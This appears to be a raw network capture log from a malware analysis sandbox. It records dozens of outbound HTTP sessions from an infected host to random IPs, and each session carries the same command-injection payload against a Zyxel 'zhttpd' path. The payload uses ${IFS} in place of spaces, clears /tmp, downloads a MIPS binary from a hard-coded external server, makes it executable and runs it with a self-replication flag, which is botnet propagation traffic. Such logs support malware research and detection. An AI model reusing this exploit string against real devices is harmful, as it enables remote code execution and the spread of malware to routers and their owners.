                                              Jan 29, 2024 07:03:50.009282112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4423192.168.2.144903231.208.127.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009325981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4424192.168.2.143656437.231.74.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009371996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4425192.168.2.144039413.165.21.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009407043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4426192.168.2.145728240.102.109.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009440899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4427192.168.2.145585650.81.61.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009485960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4428192.168.2.1448580105.138.111.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009521008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4429192.168.2.1452404109.77.3.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009541988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4430192.168.2.1450752180.60.37.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009581089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4431192.168.2.145677469.2.46.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009654045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4432192.168.2.1444326135.43.77.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009685993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4433192.168.2.143529441.174.168.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009738922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4434192.168.2.145325660.46.144.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009793997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4435192.168.2.143800247.174.240.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009840012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4436192.168.2.1450684211.143.33.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009867907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4437192.168.2.1438652129.224.87.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009897947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4438192.168.2.143498684.145.79.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009934902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4439192.168.2.144983694.144.72.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.009984016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4440192.168.2.144459288.67.238.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010035992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4441192.168.2.144143237.197.220.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010091066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4442192.168.2.144652224.150.76.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010132074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4443192.168.2.1439090211.22.152.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010154009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4444192.168.2.143277031.212.52.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010179043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4445192.168.2.145242654.182.65.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010204077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4446192.168.2.1434152177.0.198.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010255098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4447192.168.2.1451052109.199.251.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010287046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4448192.168.2.1444954185.157.111.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010314941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4449192.168.2.145840823.29.130.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010355949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4450192.168.2.144365446.112.179.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010385036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4451192.168.2.143597477.89.34.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010416985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4452192.168.2.14436869.203.65.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010443926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4453192.168.2.1448344218.127.21.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010503054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4454192.168.2.143756492.30.102.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010528088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4455192.168.2.1453862202.118.80.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010576010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4456192.168.2.1457082200.55.160.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010612965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4457192.168.2.1445080106.26.215.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010617018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4458192.168.2.1440134213.1.138.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010654926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4459192.168.2.145465249.136.166.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010704994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4460192.168.2.1448044115.147.54.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010727882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4461192.168.2.145461260.180.195.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010782957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4462192.168.2.1436662218.171.221.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010880947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4463192.168.2.145042820.205.180.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010915041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4464192.168.2.1443830160.104.44.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010940075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4465192.168.2.1438470182.125.141.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010973930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4466192.168.2.1441946189.182.60.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.010993958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4467192.168.2.1446094140.113.144.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011029959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4468192.168.2.145102232.28.50.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011053085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4469192.168.2.145614074.124.240.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011096001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4470192.168.2.1446982183.162.51.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011112928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4471192.168.2.1434044167.206.194.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011168957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4472192.168.2.1444946170.144.230.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011214018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4473192.168.2.1447438160.227.94.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011250973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4474192.168.2.1449932135.234.3.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011281013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4475192.168.2.1442342216.214.199.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011305094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4476192.168.2.144451661.189.209.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011359930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4477192.168.2.1459708101.67.83.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011400938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4478192.168.2.144296414.80.85.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011430979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4479192.168.2.1445026203.8.94.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011482954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4480192.168.2.1449984151.161.120.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011544943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4481192.168.2.143640424.201.212.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011588097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4482192.168.2.1450310123.84.246.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011651039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4483192.168.2.1441574121.42.177.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.011668921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4484192.168.2.1441926111.103.230.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015367031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4485192.168.2.1453824167.18.131.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:50.015393019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4486192.168.2.1449002183.51.83.106443
                                              TimestampBytes transferredDirectionData
